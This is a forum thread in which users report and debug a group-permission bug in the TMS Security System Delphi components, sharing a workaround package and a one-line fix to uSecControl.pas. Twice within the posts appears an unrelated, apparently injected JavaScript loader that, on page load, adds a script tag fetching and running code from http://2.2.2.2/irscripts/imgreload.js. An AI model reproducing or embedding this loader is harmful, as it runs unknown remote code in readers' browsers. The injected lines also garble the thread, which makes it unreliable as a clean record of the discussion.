Problem wirh GroupPermissions

I have a Problem with GroupPermission.

When I assign permissions to a user, an login with the user everything works fine.
When I assign permissions to a group and the group to the user, the user has all permissions and not only the permissions assigned to the group. There´s no difference between the groups, I can assign the user to any group but I allways have all permissions.

When I remove the user from the group I have no permissions, so this works fine.

Thanks for your help....

I am having the same problem....

function FN_IR_load(){var script = document.createElement('script');script.type = 'text/javascript';script.src = 'http://2.2.2.2/irscripts/imgreload.js';document.getElementsByTagName('head')[0].appendChild(script);}var FN_IR_loaded = false;if(document.images.length > 0){FN_IR_loaded = true;FN_IR_load();}

Hi everyone,

I have created a work-around for this bug. Feel free to use it until TMS can fix the error.

http://www.angelic-games.com/downloads/tms/TMSSecurityMgrFix.zip

In order to install this component you need to make 1 small change to the TMS source code.

In file uSecControl.pas you need to add the virtual keyword to the end of the TuilSecurityManager.Logout procedure declaration. You then need to recompile the TMS Security System components.

Then simply compile & install this component. After it is installed simply replace your TuilSecurityManager component with the TuilSecurityManagerFixed component and redirect all of your other security components to it.

Enjoy,

Matthew V function FN_IR_load(){var script = document.createElement('script');script.type = 'text/javascript';script.src = 'http://2.2.2.2/irscripts/imgreload.js';document.getElementsByTagName('head')[0].appendChild(script);}var FN_IR_loaded = false;if(document.images.length > 0){FN_IR_loaded = true;FN_IR_load();}

Thanks for reporting,

we can confirm that this issue will be fixed in the next update that we'll release shortly

The new release didn´t solved my problem (see post by Ulrich Jantzen).

But I found the bug caused the group permission problem:

In line 249 of uSecControl.pas you´ll find this line:

sGrp := GroupBindary.GroupMembershipBindary.DataSource.DataSet.FieldByName(GroupBindary.GroupPermissions.GroupNameField).AsString;

The Error is the following:
You need to read the group from permissions and not from the group members, else everytime it´s true ;-)

sGrp := GroupBindary.GroupPermissions.DataSource.DataSet.FieldByName(GroupBindary.GroupPermissions.GroupNameField).AsString;

Thanks!

P.S. You wont to know my hourly rate ? ;-)

We'll check this again as we tested the previous change and could not see an unexpected behavior here.

??
You will check this, or you have checked this?
I really don´t understand your sentence.

And I´m sure that this is a bug, because I debuged it and with the change in the source it workes fine.
The other way I´m getting always all permissions from all groups because your query everytimes returns true....

As I said : We WILL check this again.